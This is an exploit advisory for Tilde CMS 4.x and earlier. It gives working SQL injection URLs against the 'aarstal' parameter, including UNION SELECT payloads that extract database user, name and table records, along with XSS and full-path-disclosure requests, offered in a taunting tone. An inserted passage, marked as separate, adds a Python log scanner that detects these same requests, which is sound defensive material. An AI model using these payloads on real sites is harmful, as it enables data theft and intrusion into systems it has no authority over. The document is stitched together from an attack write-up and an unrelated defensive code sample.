Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection



---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------

http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC

D'u need an explanation?!? i don't think so :P
---------------------------------------------------------------
SQL Injection

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=%27

A few examples

Using the user() and database() functions you can get some information about the database, such as:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*

Or you can pull some records out of the database, like:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*

D'u want the tables n' the rows? Find it yourself ;P
---------------------------------------------------------------
something else..

Xss Vulnerability

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]
---------------------------------------------------------------
Full Path Disclosure

http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on
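As an added example (not part of the advisory, and not Tilde CMS code), a small Python checker run over constructed Apache access-log lines that flags the three request shapes above: a non-numeric `aarstal` value, the comment-padded `union ... select` form, and a `search` term beginning with `<` in search mode. The path `/tilde/index.php`, the client IP and the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-log lines (not real traffic): one legitimate
# request, then the SQLi, XSS and full-path-disclosure probes from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /tilde/index.php?id=12&mode=yeardetail&aarstal=2006 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2006:13:55:40 +0000] "GET /tilde/index.php?id=12&mode=yeardetail&aarstal=%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2006:13:55:44 +0000] "GET /tilde/index.php?id=12&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/* HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2006:13:55:50 +0000] "GET /tilde/index.php?id=12&mode=yeardetail&aarstal=%3Cb%3Eprobe%3C/b%3E HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2006:13:55:55 +0000] "GET /tilde/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')
SQL_WORDS = re.compile(r"\b(union|select|from|where|user|database|or|and)\b", re.I)

def normalize(value):
    """Decode once more (catches double-encoding) and turn /*...*/ padding into spaces."""
    return re.sub(r"/\*.*?\*/", " ", unquote_plus(value), flags=re.S)

def classify(url):
    """Return (tag, parameter, decoded value) findings for one request URL."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    findings = []
    for raw in params.get("aarstal", []):   # 'aarstal' is a year: digits only
        val = normalize(raw)
        if re.fullmatch(r"\d{1,4}", val):
            continue
        if "'" in val or SQL_WORDS.search(val):
            findings.append(("sqli", "aarstal", val))
        elif "<" in val or ">" in val:
            findings.append(("xss", "aarstal", val))
        else:
            findings.append(("anomalous", "aarstal", val))
    if params.get("mode") == ["search"]:    # search term starting with '<' = FPD probe
        for raw in params.get("search", []):
            if unquote_plus(raw).startswith("<"):
                findings.append(("fpd-probe", "search", unquote_plus(raw)))
    return findings

def scan(log_text):
    """Return (client_ip, tag, parameter, value) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            for tag, param, val in classify(m.group("url")):
                hits.append((line.split()[0], tag, param, val))
    return hits
```

`scan(SAMPLE_LOG)` returns four hits (two sqli, one xss, one fpd-probe) and nothing for the legitimate year request; the same `classify()` check, applied server-side before the value reaches the query, is the fix a patched Tilde install needs.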
---------------------------------------------------------------